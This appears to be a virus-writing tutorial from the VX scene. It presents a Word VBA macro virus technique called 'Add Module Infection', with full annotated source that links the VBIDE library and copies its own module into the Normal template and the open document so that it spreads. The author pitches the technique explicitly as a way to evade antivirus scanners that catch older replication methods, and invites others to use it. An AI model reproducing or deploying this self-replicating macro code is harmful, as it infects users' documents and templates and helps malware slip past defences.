'Add Module Infection'
Technic
By jackie twoflower
Hi there, this what you read here is the tutorial a new infection tech for VBA. I got the idea for this technic while I was working on a creator. I thougt that it would be a got idea to add a module and insert then the code. This is completly new, if we look at old technics...
Very old technic:
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:="DUAL", _
Object:=wdOrganizerObjectProjectItems
This is a very old technic and the main problem is that it don't works anymore under SR-1. So then Lord Natas found another new technic. Let's take a look on the code...
Common technic:
ActiveDocument.VBProject.VBComponents("DUAL").Export "c:\dual.sys"
....
Normaltemplate.VBProject.VBComponents.Import "c:\dual.sys"
This technic was better and even SR-1 compatible. But a main problem was that this technics were typical of macro virii and every AV scanner scans it. So it was time for a new technic. Tatata I proudly present:
Add Module Infection
This, short called AMI, is a new technic for infection. While I was working on this technic, I had a big problem to solve. The problem was that I had to link a library to the active project. I asked around IRC and so, but nobody knowed a solution. So I sad down and tried and tried and tried and.... suddenly I found the solution!!! K, I have talked enough, let's take a look at this new technic...
Add Module Infection:
> This is a comment... -----------------------------[code starts here]---------------------------- Public Normal_ As Object, Active_ As Object > Declare the two object variables we need... Sub Add_Modul_Infection() On Error Resume Next Set Normal_ = NormalTemplate.VBProject Set Active_ = ActiveDocument.VBProject > Set the objects... Const ModulName_ = "A_M_I" > Set the constant 'ModulName_' to 'A_M_I', coz the name of the module > won't change... NormalIns_ = False ActiveIns_ = False > Set the install checker both to false... CheckRefNormal_ CheckRefActive_ > This here is very important. We call the two functions to see if the > library we need for AMI is already linked. One checks the Template, one > the document... NormalComp_ = Normal_.VBComponents.Count ActiveComp_ = Active_.VBComponents.Count > Set the value of these to variables to the number of VBComponents in the > template and the document... For x = 1 To NormalComp_ If Normal_.VBComponents(x).Name = ModulName_ Then _ NormalIns_ = True Next > Check here if we are already installed in the template... For y = 1 To ActiveComp_ If Active_.VBComponents(y).Name = ModulName_ Then _ ActiveIns_ = True Next > Check if we are already installed in the document... If NormalIns_ = False Then VirusLength_ = Active_.VBComponents(ModulName_) _ .CodeModule.CountOfLines > Set the length of the code in the active document module into the > variable 'VirusLength_' VirusCode_ = Active_.VBComponents(ModulName_) _ .CodeModule.Lines(1, VirusLength_) > Insert the code of the active document module into the string 'VirusCode_' Normal_.VBComponents.Add (vbext_ct_StdModule) > Add a module to the template. For this we need the library... Normal_.VBComponents((NormalComp_ + 1)).Name = ModulName_ > Change the name of the added module to 'AMI'... Normal_.VBComponents(ModulName_).CodeModule.AddFromString VirusCode_ > Insert the viruscode into new module... End If If ActiveIns_ = False Then > This is the same for the document... VirusLength_ = Normal_.VBComponents(ModulName_) _ .CodeModule.CountOfLines > Count the length of the virus in the template and set it into the > integer 'VirusLength_'... VirusCode_ = Normal_.VBComponents(ModulName_) _ .CodeModule.Lines(1, VirusLength_) > Insert the template code into the string 'VirusCode_'... Active_.VBComponents.Add (vbext_ct_StdModule) > Add the module to the document... Active_.VBComponents((ActiveComp_ + 1)).Name = ModulName_ > Change the name of the added module to 'AMI'... Active_.VBComponents(ModulName_).CodeModule.AddFromString VirusCode_ > Insert the code into the new module... End If End Sub Function CheckRefNormal_() > This function checks if the library is alread linked to the template. If > not it adds it... CheckRefNormal_ = False For I = 1 To Normal_.References.Count If Normal_.References(I).Name = "VBIDE" Then CheckRefNormal_ = True Next > Same as checking for modulenames, but here we check for the library... If CheckRefNormal_ = False Then Normal_.References _ .AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0 > If our needed library isn't linked, then link it with this command... End If End Function Function CheckRefActive_() > Same as above but for the document... CheckRefActive_ = False For I = 1 To Active_.References.Count If Active_.References(I).Name = "VBIDE" Then CheckRefActive_ = True Next > Check for the library... If CheckRefActive_ = False Then Active_.References _ .AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0 > If it's not linked, link it! End If End Function ' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ' Jack Twoflower presents: AddModuleInfection ' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --------------------------------[code ends here]---------------------------
Hmmm...what do you think about this? I took me really long to find out how to link a library. If you want to use this technic use it but give me credits. Thanks!
Keep Vxing,
jack twoflower